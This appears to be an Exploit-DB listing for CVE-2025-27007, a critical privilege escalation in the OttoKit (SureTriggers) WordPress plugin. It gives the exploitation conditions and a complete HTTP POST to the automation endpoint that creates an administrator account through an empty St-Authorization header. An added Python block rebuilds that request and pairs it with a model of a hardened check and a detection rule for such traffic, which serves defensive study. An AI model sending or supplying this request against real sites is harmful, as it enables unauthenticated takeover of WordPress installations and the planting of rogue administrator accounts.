Exploit Details
Basic Information
| Exploit Title | SureTriggers OttoKit Plugin 1.0.82 – Privilege Escalation |
|---|---|
| Exploit ID | EDB-ID:52286 |
| Type | exploitdb |
| Published | 2025-05-09T00:00:00 |
| Modified | 2025-05-09T00:00:00 |
CVSS Information
| CVSS Score | 9.8 |
|---|---|
| Severity | CRITICAL |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
CVE Information
- CVE-2025-27007
Exploit Description
Exploit Code
# Date: 2025-05-07
# Exploit Author: Abdualhadi khalifa (https://x.com/absholi7ly/)
# Affected: All versions of OttoKit (SureTriggers) ≤ 1.0.82.
Conditions for Exploitation
The vulnerability can be exploited under the following circumstances:
1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin is uninitialized (no API key / "secret_key" has been stored
in the database), so the request's St-Authorization value is checked
against an empty stored key and an empty header passes.
3. The target site exposes the REST API endpoint
/wp-json/sure-triggers/v1/automation/action.
——————————
HTTP Request
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=[email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&integration=WordPress&type_event=create_user_if_not_exists
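The following Python block is an added example and is not part of the EDB-ID:52286 listing or of the OttoKit/SureTriggers plugin code. It models the precondition in the conditions list above (no stored secret key, so an empty St-Authorization header is accepted) next to a hardened check, builds the request body shown in the listing, and runs a simple detection rule over constructed request records. The function names, the hardened check, the record shape, and the sample hostname and e-mail address are assumptions for illustration; the plugin's real PHP logic is not reproduced.

```python
"""
Added example (not the EDB-ID:52286 listing's code nor the plugin's own).

- vulnerable_auth / hardened_auth: a model of the described weak check
  (empty stored key == empty header) and an assumed fix.
- build_exploit_request: the listing's POST body, urlencoded.
- is_suspicious: detection rule over parsed request records.
"""
import hmac
from typing import Optional
from urllib.parse import urlencode, parse_qs

ACTION_PATH = "/wp-json/sure-triggers/v1/automation/action"


def vulnerable_auth(stored_secret: Optional[str], header_value: Optional[str]) -> bool:
    """Model of the weak check: plain equality. With no secret stored
    (None or ""), a missing or empty St-Authorization header compares equal."""
    return (stored_secret or "") == (header_value or "")


def hardened_auth(stored_secret: Optional[str], header_value: Optional[str]) -> bool:
    """Assumed fix: refuse when either side is empty, then compare in constant time."""
    if not stored_secret or not header_value:
        return False
    return hmac.compare_digest(stored_secret.encode(), header_value.encode())


def build_exploit_request(host: str, user: str, email: str, password: str) -> dict:
    """Return method/path/headers/body mirroring the listing's HTTP request.
    Body is application/x-www-form-urlencoded; St-Authorization is sent empty."""
    body = urlencode({
        "selected_options[user_name]": user,
        "selected_options[user_email]": email,
        "selected_options[password]": password,
        "selected_options[role]": "administrator",
        "integration": "WordPress",
        "type_event": "create_user_if_not_exists",
    })
    headers = {
        "Host": host,
        "Content-Type": "application/x-www-form-urlencoded",
        "St-Authorization": "",
        "Content-Length": str(len(body)),
    }
    return {"method": "POST", "path": ACTION_PATH, "headers": headers, "body": body}


def is_suspicious(record: dict) -> bool:
    """Detection rule over a parsed request record (assumed shape:
    {"method", "path", "headers", "body"}). Flags POSTs to the automation
    endpoint that carry no or an empty St-Authorization header and request
    an administrator via create_user_if_not_exists."""
    if record.get("method") != "POST" or not record.get("path", "").endswith(ACTION_PATH):
        return False
    hdrs = {k.lower(): v for k, v in record.get("headers", {}).items()}
    if hdrs.get("st-authorization"):
        return False  # non-empty token: ordinary integration traffic
    params = parse_qs(record.get("body", ""))
    return (params.get("type_event") == ["create_user_if_not_exists"]
            and params.get("selected_options[role]") == ["administrator"])


# Constructed sample records (not real traffic); hostname/e-mail are placeholders.
SAMPLE_RECORDS = [
    build_exploit_request("target.example", "new_admin", "admin@example.com", "StrongP@ssw0rd123"),
    {"method": "POST", "path": ACTION_PATH,
     "headers": {"St-Authorization": "a1b2c3"},
     "body": "integration=WordPress&type_event=create_user_if_not_exists"
             "&selected_options[role]=subscriber"},
    {"method": "GET", "path": "/wp-json/wp/v2/posts", "headers": {}, "body": ""},
]


def flagged_indices(records=SAMPLE_RECORDS) -> list:
    """Indices of records matching the detection rule."""
    return [i for i, r in enumerate(records) if is_suspicious(r)]


if __name__ == "__main__":
    print(flagged_indices())
```

The detection rule keys on the combination of an empty St-Authorization header and an administrator-creating action, which is what distinguishes this request from legitimate integration traffic carrying a real key; a site that has configured its key will reject the empty header in the hardened model regardless of body contents.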